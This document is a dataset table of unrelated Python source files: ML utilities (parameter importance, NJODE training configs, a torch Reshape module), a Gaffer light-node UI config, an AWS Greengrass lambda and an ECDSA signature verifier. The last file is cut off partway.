content
stringlengths 5
1.05M
|
|---|
import pytest
from mantisshrimp.imports import nn
@pytest.fixture(scope="module")
def simple_backbone():
class SimpleBackbone(nn.Module):
def __init__(self):
super().__init__()
self.c1 = nn.Conv2d(3, 8, 3, 2)
self.c2 = nn.Conv2d(8, 16, 3, 2)
self.out_channels = 16
def forward(self, x):
return self.c2(self.c1(x))
return SimpleBackbone()
|
# -*- coding: utf-8 -*-
"""
Provide tools to calculate Local Parameter Importance
=====================================================
"""
import numpy
import pandas as pd
from orion.analysis.base import flatten_numpy, to_numpy, train_regressor
from orion.core.worker.transformer import build_required_space
def make_grid(point, space, model, n_points):
"""Build a grid based on point.
The shape of the grid will be
(number of hyperparameters,
number of points ``n_points``,
number of hyperparameters + 1)
Last column is the objective predicted by the model for a given point.
Parameters
----------
point: numpy.ndarray
A tuple representation of the best trials, (hyperparameters + objective)
space: Space object
A space object from an experiment. It must be flattened and linearized.
model: `sklearn.base.RegressorMixin`
Trained regressor used to compute predictions on the grid
n_points: int
Number of points for each dimension on the grid.
"""
grid = numpy.zeros((len(space), n_points, len(space) + 1))
for i, dim in enumerate(space.values()):
grid[i, :, :] = point
grid[i, :, i] = numpy.linspace(*dim.interval(), num=n_points)
grid[i, :, -1] = model.predict(grid[i, :, :-1])
return grid
def compute_variances(grid):
"""Compute variance for each hyperparameters"""
return grid[:, :, -1].var(axis=1)
def _lpi(point, space, model, n_points):
"""Local parameter importance for each hyperparameters"""
grid = make_grid(point, space, model, n_points)
variances = compute_variances(grid)
ratios = variances / variances.sum()
return ratios
# def _linear_lpi(point, space, model, n):
# # TODO
# return
modes = dict(best=_lpi) # , linear=_linear_lpi)
def lpi(
trials,
space,
mode="best",
model="RandomForestRegressor",
n_points=20,
n_runs=10,
**kwargs
):
"""
Calculates the Local Parameter Importance for a collection of
:class:`orion.core.worker.trial.Trial`.
For more information on the metric, see original paper at
https://ml.informatik.uni-freiburg.de/papers/18-LION12-CAVE.pdf.
Biedenkapp, André, et al. "Cave: Configuration assessment, visualization and evaluation."
International Conference on Learning and Intelligent Optimization. Springer, Cham, 2018.
Parameters
----------
trials: DataFrame or dict
A dataframe of trials containing, at least, the columns 'objective' and 'id'. Or a dict
equivalent.
space: Space object
A space object from an experiment.
mode: str
Mode to compute the LPI.
- ``best``: Take the best trial found as the anchor for the LPI
- ``linear``: Recompute LPI for all values on a grid
model: str
Name of the regression model to use. Can be one of
- AdaBoostRegressor
- BaggingRegressor
- ExtraTreesRegressor
- GradientBoostingRegressor
- RandomForestRegressor (Default)
n_points: int
Number of points to compute the variances. Default is 20.
n_runs: int
Number of runs to compute the standard error of the LPI. Default is 10.
``**kwargs``
Arguments for the regressor model.
Returns
-------
DataFrame
LPI value for each parameter. If ``mode`` is `linear`, then a list of
param values and LPI metrics are returned in a DataFrame format.
"""
flattened_space = build_required_space(
space,
dist_requirement="linear",
type_requirement="numerical",
shape_requirement="flattened",
)
if trials.empty or trials.shape[0] == 0:
return pd.DataFrame(
data=[0] * len(flattened_space),
index=flattened_space.keys(),
columns=["LPI"],
)
data = to_numpy(trials, space)
data = flatten_numpy(data, flattened_space)
best_point = data[numpy.argmin(data[:, -1])]
rng = numpy.random.RandomState(kwargs.pop("random_state", None))
results = numpy.zeros((n_runs, len(flattened_space)))
for i in range(n_runs):
trained_model = train_regressor(
model, data, random_state=rng.randint(2**32 - 1), **kwargs
)
results[i] = modes[mode](best_point, flattened_space, trained_model, n_points)
averages = results.mean(0)
standard_errors = results.std(0)
frame = pd.DataFrame(
data=numpy.array([averages, standard_errors]).T,
index=flattened_space.keys(),
columns=["LPI", "STD"],
)
return frame
|
import json
import pandas as pd
files = ['jsonfile/search_subjects.json', 'jsonfile/search_subjects (1).json', 'jsonfile/search_subjects (2).json', 'jsonfile/search_subjects (3).json']
for file in files:
f = open(file, 'r', encoding='utf-8')
ps = json.load(f)
numl = []
for p in ps['subjects']:
num = p['id']
numl.append(num)
pd.DataFrame(numl).to_csv('data/movieid2.csv', mode='a', header=False, index=True, encoding='utf-8')
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferOSL
Gaffer.Metadata.registerNode(
GafferOSL.OSLLight,
"description",
"""
Creates lights by assigning an emissive OSL shader to some simple geometry.
""",
"layout:activator:shapeHasRadius", lambda node : node["shape"].getValue() != node.Shape.Geometry,
"layout:activator:shapeIsGeometry", lambda node : node["shape"].getValue() == node.Shape.Geometry,
plugs = {
"parameters" : [
"layout:index", -1, # Move after shape parameters
],
"shaderName" : [
"description",
"""
The OSL shader to be assigned to the light
geometry.
""",
"plugValueWidget:type", "",
],
"shape" : [
"description",
"""
The shape of the light. Typically, disks
should be used with spotlight shaders and spheres
should be used with point light shaders. The "Geometry"
shape allows the use of custom geometry specific to a
particular renderer.
""",
"preset:Disk", GafferOSL.OSLLight.Shape.Disk,
"preset:Sphere", GafferOSL.OSLLight.Shape.Sphere,
"preset:Geometry", GafferOSL.OSLLight.Shape.Geometry,
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"radius" : [
"description",
"""
The radius of the disk or sphere shape. Has no effect for
other shapes.
""",
"layout:visibilityActivator", "shapeHasRadius",
],
"geometryType" : [
"description",
"""
The type of geometry to create when shape is set
to "Geometry". This should contain the name of a geometry
type specific to the renderer being used.
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"geometryBound" : [
"description",
"""
The bounding box of the geometry. Only relevant when the
shape is set to "Geometry".
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"geometryParameters" : [
"description",
"""
Arbitary parameters which specify the features of the "Geometry"
shape type.
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"attributes" : [
"description",
"""
Arbitrary attributes which are applied to the light. Typical
uses include setting renderer specific visibility attributes
to hide the shape from the camera.
""",
"layout:section", "Settings.Attributes",
],
}
)
# Defer parameter metadata lookups to the internal shader
# node.
def __parameterMetadata( plug, key ) :
node = plug.node()
return Gaffer.Metadata.value( node["__shader"]["parameters"].descendant( plug.relativeName( node["parameters"] ) ), key )
for key in [
"description",
"label",
"noduleLayout:label",
"layout:divider",
"layout:section",
"presetNames",
"presetValues",
"plugValueWidget:type",
"nodule:type",
"noduleLayout:visible",
"noduleLayout:label",
] :
Gaffer.Metadata.registerValue( GafferOSL.OSLLight, "parameters.*", key, functools.partial( __parameterMetadata, key = key ) )
|
#
# Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
import sys
import logging
import greengrasssdk
# Setup logging to stdout
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
client = greengrasssdk.client('iot-data')
def uptime_handler(event, context):
logger.info("Received message!")
if 'state' in event:
if event['state'] == "on":
client.publish(
topic='/topic/metering',
payload="Robot arm turned ON")
logger.info("Triggering publish to topic "
"/topic/metering with ON state")
elif event['state'] == "off":
client.publish(
topic='/topic/metering',
payload="Robot arm turned OFF")
logger.info("Triggering publish to topic "
"/topic/metering with OFF state")
|
import hashlib
import base64
import ecdsa
from connaisseur.exceptions import InvalidPublicKey
def verify_signature(public_base64: str, signature_base64: str, message: str):
"""
Verifies the given bas64-encoded signature with the base64-encoded public
key and serialized message. The message should not contain any whitespaces.
Raises ValidationError if unsuccessful.
"""
pub_key = decode_and_verify_ecdsa_key(public_base64)
signature = base64.b64decode(signature_base64)
msg_bytes = bytearray(message, "utf-8")
return pub_key.verify(signature, msg_bytes, hashfunc=hashlib.sha256)
def decode_and_verify_ecdsa_key(public_base64: str):
"""
Verifies that the provided public key in base64 encoding qualifies as a
proper ecdsa key and throws if not.
"""
try:
public = base64.b64decode(public_base64)
return ecdsa.VerifyingKey.from_der(public)
except Exception as err:
raise InvalidPublicKey(
f"The public key provided is not a base64-encoded ECDSA key: {err}."
) from err
|
"""
author: Florian Krach & Calypso Herrera
code for parallel training
"""
# =====================================================================================================================
import numpy as np
import os, sys
import pandas as pd
import json
import socket
import matplotlib
import copy
from sklearn.model_selection import ParameterGrid
from joblib import Parallel, delayed
try:
from telegram_notifications import send_bot_message as SBM
except Exception:
class Sbm:
def __init__(self):
pass
@staticmethod
def send_notification(text, *args, **kwargs):
print(text)
SBM = Sbm()
sys.path.append("../")
try:
from . import extras as extras
except Exception:
import NJODE.extras as extras
# =====================================================================================================================
# check whether running on computer or server
if 'ada-' not in socket.gethostname():
SERVER = False
N_JOBS = 1
SEND = False
else:
SERVER = True
N_JOBS = 27
SEND = True
print(socket.gethostname())
print('SERVER={}'.format(SERVER))
if SERVER:
matplotlib.use('Agg')
sys.path.append("../")
try:
from . import data_utils as data_utils
from . import train
from . import climate_train
from . import physionet_train
except Exception:
import NJODE.data_utils as data_utils
import NJODE.train as train
import NJODE.climate_train as climate_train
import NJODE.physionet_train as physionet_train
error_chat_id = "-437994211"
DEBUG = False
# =====================================================================================================================
# Functions
def train_switcher(**params):
"""
function to call the correct train function depending on the dataset. s.t.
parallel training easily works altough different fuctions need to be called
:param params: all params needed by the train function, as passed by
parallel_training
:return: function call to the correct train function
"""
if 'dataset' not in params:
raise KeyError('the "dataset" needs to be specified')
elif params['dataset'] in ["BlackScholes", "Heston", "OrnsteinUhlenbeck",
"HestonWOFeller", "sine_BlackScholes",
"sine_Heston", "sine_OrnsteinUhlenbeck"] or \
'combined' in params['dataset']:
return train.train(**params)
elif params['dataset'] in ['climate', 'Climate']:
return climate_train.train(**params)
elif params['dataset'] in ['physionet', 'Physionet']:
return physionet_train.train(**params)
else:
raise ValueError('the specified "dataset" is not supported')
def get_parameter_array(param_dict):
"""
helper function to get a list of parameter-list with all combinations of
parameters specified in a parameter-dict
:param param_dict: dict with parameters
:return: 2d-array with the parameter combinations
"""
param_combs_dict_list = list(ParameterGrid(param_dict))
return param_combs_dict_list
def parallel_training(params=None, model_ids=None, nb_jobs=1, first_id=None,
saved_models_path=train.saved_models_path,
overwrite_params=None):
"""
function for parallel training, based on train.train
:param params: a list of param_dicts, each dict corresponding to one model
that should be trained, can be None if model_ids is given
(then unused)
all kwargs needed for train.train have to be in each dict
-> giving the params together with first_id, they can be used to
restart parallel training (however, the saved params for all
models where the model_id already existed will be used instead
of the params in this list, so that no unwanted errors are
produced by mismatching. whenever a model_id didn't exist yet
the params of the list are used to make a new one)
-> giving params without first_id, all param_dicts will be used to
initiate new models
:param model_ids: list of ints, the model ids to use (only those for which a
model was already initiated and its description was saved to the
model_overview.csv file will be used)
-> used to restart parallel training of certain model_ids after the
training was stopped
:param nb_jobs: int, the number of CPUs to use parallelly
:param first_id: int or None, the model_id corresponding to the first
element of params list
:param saved_models_path: str, path to saved models
:param overwrite_params: None or dict with key the param name to be
overwritten and value the new value for this param. can bee used to
continue the training of a stored model, where some params should be
changed (e.g. the number of epochs to train longer)
:return:
"""
if params is not None and 'saved_models_path' in params[0]:
saved_models_path = params[0]['saved_models_path']
model_overview_file_name = '{}model_overview.csv'.format(
saved_models_path)
train.makedirs(saved_models_path)
if not os.path.exists(model_overview_file_name):
df_overview = pd.DataFrame(data=None, columns=['id', 'description'])
max_id = 0
else:
df_overview = pd.read_csv(model_overview_file_name, index_col=0)
max_id = np.max(df_overview['id'].values)
# get model_id, model params etc. for each param
if model_ids is None and params is None:
return 0
if model_ids is None:
if first_id is None:
model_id = max_id + 1
else:
model_id = first_id
for i, param in enumerate(params):
if model_id in df_overview['id'].values:
desc = (df_overview['description'].loc[
df_overview['id'] == model_id]).values[0]
params_dict = json.loads(desc)
params_dict['resume_training'] = True
params_dict['model_id'] = model_id
if overwrite_params:
for k, v in overwrite_params.items():
params_dict[k] = v
desc = json.dumps(params_dict, sort_keys=True)
df_overview.loc[
df_overview['id'] == model_id, 'description'] = desc
df_overview.to_csv(model_overview_file_name)
params[i] = params_dict
else:
desc = json.dumps(param, sort_keys=True)
df_ov_app = pd.DataFrame([[model_id, desc]],
columns=['id', 'description'])
df_overview = pd.concat([df_overview, df_ov_app],
ignore_index=True)
df_overview.to_csv(model_overview_file_name)
params_dict = json.loads(desc)
params_dict['resume_training'] = False
params_dict['model_id'] = model_id
params[i] = params_dict
model_id += 1
else:
params = []
for model_id in model_ids:
if model_id not in df_overview['id'].values:
print("model_id={} does not exist yet -> skip".format(model_id))
else:
desc = (df_overview['description'].loc[
df_overview['id'] == model_id]).values[0]
params_dict = json.loads(desc)
params_dict['model_id'] = model_id
params_dict['resume_training'] = True
if overwrite_params:
for k, v in overwrite_params.items():
params_dict[k] = v
desc = json.dumps(params_dict, sort_keys=True)
df_overview.loc[
df_overview['id'] == model_id, 'description'] = desc
df_overview.to_csv(model_overview_file_name)
params.append(params_dict)
for param in params:
param['parallel'] = True
if SEND:
SBM.send_notification(
text='start parallel training - \nparams:'
'\n\n{}'.format(params)
)
if DEBUG:
results = Parallel(n_jobs=nb_jobs)(delayed(train_switcher)(**param)
for param in params)
if SEND:
SBM.send_notification(
text='finished parallel training - \nparams:'
'\n\n{}'.format(params)
)
else:
try:
results = Parallel(n_jobs=nb_jobs)(delayed(train_switcher)(**param)
for param in params)
if SEND:
SBM.send_notification(
text='finished parallel training - \nparams:'
'\n\n{}'.format(params)
)
except Exception as e:
if SEND:
SBM.send_notification(
text='error in parallel training - \nerror:'
'\n\n{}'.format(e),
chat_id=error_chat_id
)
else:
print('error:\n\n{}'.format(e))
if __name__ == '__main__':
# ==========================================================================
# create dataset
# ==========================================================================
#dataset_dict = data_utils.hyperparam_default
#dataset_dict['nb_paths'] = 20000
#for dataset in ["BlackScholes", "Heston", "OrnsteinUhlenbeck"]:
# datasetpath, dataset_id = data_utils.create_dataset(
# stock_model_name=dataset, hyperparam_dict=dataset_dict)
# ==========================================================================
# parallel training
# ==========================================================================
ode_nn = ((50, 'tanh'), (50, 'tanh'))
readout_nn = ((50, 'tanh'), (50, 'tanh'))
enc_nn = ((50, 'tanh'), (50, 'tanh'))
param_dict1 = {
'epochs': [200],
'batch_size': [200],
'save_every': [5],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [ode_nn],
'readout_nn': [readout_nn],
'enc_nn': [enc_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
'dataset_id': [None],
'plot': [True],
'paths_to_plot': [(0,1,2,3,4,)]
}
params_list1 = get_parameter_array(param_dict=param_dict1)
# params_list = params_list1
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=4)
# ==========================================================================
# parallel training for convergence analysis
# ==========================================================================
# #1: define networks to train
dataset = ["Heston"]
path = '{}conv-study-Heston-saved_models/'.format(train.data_path)
# dataset = ["BlackScholes"]
# path = '{}conv-study-BS-saved_models/'.format(train.data_path)
# dataset = ["OrnsteinUhlenbeck"]
# path = '{}conv-study-OU-saved_models/'.format(train.data_path)
training_size = [int(100 * 2 ** x) for x in np.linspace(1, 7, 7)]
network_size = [int(5 * 2 ** x) for x in np.linspace(1, 6, 6)]
ode_nn = [((size, 'tanh'), (size, 'tanh')) for size in network_size]
params_list = []
for _ode_nn in ode_nn:
param_dict3 = {
'epochs': [100],
'batch_size': [20],
'save_every': [10],
'learning_rate': [0.001],
'test_size': [0.2],
'training_size': training_size,
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': dataset,
'dataset_id': [None],
'plot': [True],
'paths_to_plot': [(0,)],
'saved_models_path': [path],
'evaluate': [True]
}
params_list3 = get_parameter_array(param_dict=param_dict3)
params_list += params_list3
# # #2: parallel training
# params_list = params_list * 5 # to get variance across different trials
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=1, saved_models_path=path)
#
# # #3: plot convergence study
# extras.plot_convergence_study(
# path=path,
# x_axis="training_size", x_log=True, y_log=True)
# extras.plot_convergence_study(
# path=path,
# x_axis="network_size", x_log=True, y_log=True)
# ==========================================================================
# parallel training for GRU-ODE-Bayes
# ==========================================================================
# #1: define networks to train
params_list = []
param_dict3 = {
'epochs': [100],
'batch_size': [20],
'save_every': [5],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [50, 100],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [None],
'readout_nn': [None],
'enc_nn': [None],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
'dataset_id': [None],
'plot': [True],
'paths_to_plot': [(0, 1, 2, 3, 4,)],
'evaluate': [True],
'other_model': ['GRU_ODE_Bayes'],
'GRU_ODE_Bayes-impute': [True, False],
'GRU_ODE_Bayes-logvar': [True, False],
'GRU_ODE_Bayes-mixing': [0.0001, 0.5],
}
params_list3 = get_parameter_array(param_dict=param_dict3)
params_list += params_list3
# for comparison: NJ-ODE
ode_nn = ((50, 'tanh'), (50, 'tanh'))
param_dict4 = {
'epochs': [100],
'batch_size': [20],
'save_every': [5],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [ode_nn],
'readout_nn': [ode_nn],
'enc_nn': [ode_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
'dataset_id': [None],
'plot': [True],
'paths_to_plot': [(0, 1, 2, 3, 4,)],
'evaluate': [True]
}
params_list4 = get_parameter_array(param_dict=param_dict4)
params_list += params_list4
# # #2: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=1)
# ==========================================================================
# parallel training on climate dataset for cross validation
# ==========================================================================
params_list = []
size = 50
_ode_nn = ((size, 'tanh'), (size, 'tanh'))
param_dict = {
'epochs': [200],
'batch_size': [100],
'save_every': [1],
'learning_rate': [0.001],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["climate"],
'data_index': [0, 1, 2, 3, 4],
'delta_t': [0.1]
}
params_list1 = get_parameter_array(param_dict=param_dict)
params_list += params_list1
size = 400
_ode_nn = ((size, 'tanh'), (size, 'tanh'))
param_dict = {
'epochs': [200],
'batch_size': [100],
'save_every': [1],
'learning_rate': [0.001],
'hidden_size': [50],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["climate"],
'data_index': [0, 1, 2, 3, 4],
'delta_t': [0.1]
}
params_list1 = get_parameter_array(param_dict=param_dict)
params_list += params_list1
# for comparison: GRU-ODE-Bayes with suggested hyper-params
param_dict = {
'epochs': [50],
'batch_size': [100],
'save_every': [1],
'learning_rate': [0.001],
'hidden_size': [50],
'bias': [True],
'dropout_rate': [0.2],
'ode_nn': [None],
'readout_nn': [None],
'enc_nn': [None],
'use_rnn': [False],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["climate"],
'data_index': [1],
'delta_t': [0.1],
'other_model': ['GRU_ODE_Bayes'],
'GRU_ODE_Bayes-impute': [False],
'GRU_ODE_Bayes-logvar': [True],
'GRU_ODE_Bayes-mixing': [1e-4],
'GRU_ODE_Bayes-p_hidden': [25],
'GRU_ODE_Bayes-prep_hidden': [10],
'GRU_ODE_Bayes-cov_hidden': [50],
}
params_list2 = get_parameter_array(param_dict=param_dict)
# # #2: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=101)
# ==========================================================================
# parallel training for Heston without Feller
# ==========================================================================
# # 0: create datasets
# dataset = 'HestonWOFeller'
# if data_utils._get_time_id(dataset) is None:
# hyperparam_dict = {
# 'drift': 2., 'volatility': 3., 'mean': 1.,
# 'speed': 2., 'correlation': 0.5, 'nb_paths': 20000, 'nb_steps': 100,
# 'S0': 1, 'maturity': 1., 'dimension': 1,
# 'obs_perc': 0.1,
# 'scheme': 'euler', 'return_vol': False, 'v0': 0.5,
# }
# data_utils.create_dataset(
# stock_model_name=dataset, hyperparam_dict=hyperparam_dict)
# hyperparam_dict['return_vol'] = True
# hyperparam_dict['dimension'] = 2
# data_utils.create_dataset(
# stock_model_name=dataset, hyperparam_dict=hyperparam_dict)
# 1: load the datasets
df_overview, filename = data_utils.get_dataset_overview()
data_ids = []
for index, row in df_overview.iterrows():
if 'HestonWOFeller' in row['name']:
data_ids.append(row['id'])
# 2: define hyper params
params_list = []
ode_nn = ((50, 'tanh'), (50, 'tanh'))
param_dict1 = {
'epochs': [200],
'batch_size': [100],
'save_every': [5],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [ode_nn],
'readout_nn': [ode_nn],
'enc_nn': [ode_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': [dataset],
'dataset_id': data_ids,
'plot': [True],
'paths_to_plot': [(0, 1, 2, 3, 4,)],
'evaluate': [True]
}
params_list1 = get_parameter_array(param_dict=param_dict1)
params_list += params_list1
# # #3: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=1)
# ==========================================================================
# parallel training for Combined stock models
# ==========================================================================
# 1: create datasets
combined_dataset = ["OrnsteinUhlenbeck", "BlackScholes"]
dat_name = 'combined'
for d in combined_dataset:
dat_name += '_{}'.format(d)
# # create dataset if it does not exist yet
# if data_utils._get_time_id(dat_name) is None:
# print('create new combined dataset')
# hyperparam_dict = data_utils.hyperparam_default
# hyperparam_dict['nb_paths'] = 20000
# hyperparam_dict['nb_steps'] = 50
# hyperparam_dict['maturity'] = 0.5
# hyperparam_dict['mean'] = 10
# hyperparam_dicts = [hyperparam_dict] * len(combined_dataset)
# data_utils.create_combined_dataset(
# stock_model_names=combined_dataset,
# hyperparam_dicts=hyperparam_dicts
# )
# 2: define hyper params
params_list = []
_ode_nn = ((100, 'tanh'), (100, 'tanh'))
param_dict1 = {
'epochs': [200],
'batch_size': [100],
'save_every': [20],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': [dat_name],
'plot': [True],
'paths_to_plot': [(0, 1, 2, 3, 4,)],
'evaluate': [True],
}
params_list1 = get_parameter_array(param_dict=param_dict1)
params_list += params_list1
# #3: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=501)
# ==========================================================================
# parallel training on physionet dataset
# ==========================================================================
# ---------- means and stds over multiple runs ---------
path = '{}saved_models_physionet_comparison/'.format(train.data_path)
network_size = [50, 200]
ode_nn = [((size, 'tanh'), (size, 'tanh')) for size in network_size]
params_list = []
for _ode_nn in ode_nn:
param_dict = {
'epochs': [175],
'batch_size': [50],
'save_every': [1],
'learning_rate': [0.001],
'hidden_size': [41],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': ["physionet"],
'quantization': [0.016],
'n_samples': [8000],
'saved_models_path': [path],
}
params_list1 = get_parameter_array(param_dict=param_dict)
params_list += params_list1
# params_list = params_list * 5
# #2: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=1, saved_models_path=path)
# ==========================================================================
# parallel training for sine stock models
# ==========================================================================
# # 1: create datasets
# if data_utils._get_time_id('sine_BlackScholes') is None:
# mn = "sine_BlackScholes"
# for sc in [2 * np.pi, 4 * np.pi]:
# print('create sine dataset: model={}, '
# 'sine_coeff={}'.format(mn, sc))
# hd = copy.deepcopy(data_utils.hyperparam_default)
# hd['sine_coeff'] = sc
# hd['nb_paths'] = 20000
# data_utils.create_dataset(mn, hd)
# 2: load the datasets
df_overview, filename = data_utils.get_dataset_overview()
data_names = []
data_ids = []
for index, row in df_overview.iterrows():
if 'sine_' in row['name']:
data_names.append(row['name'])
data_ids.append(row['id'])
# 3: define hyper params
path = '{}saved_models_sine/'.format(train.data_path)
params_list = []
_ode_nn = ((400, 'tanh'), (400, 'tanh'))
for dat_name, dat_id in zip(data_names, data_ids):
for _ode_nn in ode_nn:
param_dict1 = {
'epochs': [100],
'batch_size': [100],
'save_every': [10],
'learning_rate': [0.001],
'test_size': [0.2],
'seed': [398],
'hidden_size': [10],
'bias': [True],
'dropout_rate': [0.1],
'ode_nn': [_ode_nn],
'readout_nn': [_ode_nn],
'enc_nn': [_ode_nn],
'use_rnn': [False],
'func_appl_X': [[]],
'solver': ["euler"],
'weight': [0.5],
'weight_decay': [1.],
'dataset': [dat_name],
'dataset_id': [dat_id],
'plot': [True],
'paths_to_plot': [(0, 1, 2, 3, 4,)],
'evaluate': [True],
'saved_models_path': [path],
}
params_list1 = get_parameter_array(param_dict=param_dict1)
params_list += params_list1
# # #3: parallel training
# print('combinations: {}'.format(len(params_list)))
# nb_jobs = min(N_JOBS, len(params_list))
# print('nb_jobs: {}'.format(nb_jobs))
# parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
# first_id=1, saved_models_path=path)
|
import torch
from .Module import Module
from .utils import clear
class Reshape(Module):
def __init__(self, *args):
super(Reshape, self).__init__()
if len(args) == 0 and isinstance(args[0], torch.Size):
self.size = args[0]
else:
self.size = torch.Size(args)
self.nelement = 1
for s in self.size:
self.nelement *= s
self._input = None
self._gradOutput = None
def updateOutput(self, input):
if not input.is_contiguous():
if self._input is None:
self._input = input.new()
self._input.resize_as_(input)
self._input.copy_(input)
input = self._input
batchsize = [input.size(0)] + list(self.size)
self.output = input.view(torch.Size(batchsize))
return self.output
def updateGradInput(self, input, gradOutput):
if not gradOutput.is_contiguous():
if self._gradOutput is None:
self._gradOutput = gradOutput.new()
self._gradOutput.resize_as_(gradOutput)
self._gradOutput.copy_(gradOutput)
gradOutput = self._gradOutput
self.gradInput = gradOutput.view_as(input)
return self.gradInput
def __repr__(self):
return super(Reshape, self).__repr__() + \
'({})'.format('x'.join(map(lambda x: str(x), self.size)))
def clearState(self):
clear(self, '_input', '_gradOutput')
return super(Reshape, self).clearState()
|
from vis_dataclasses import load_image_file_zipped
from pathlib import Path
from typing import Tuple
from dataclasses import dataclass
from PIL import Image
import pygame
import numpy as np
import rasterio as rio
def pil_image_to_surface(im):
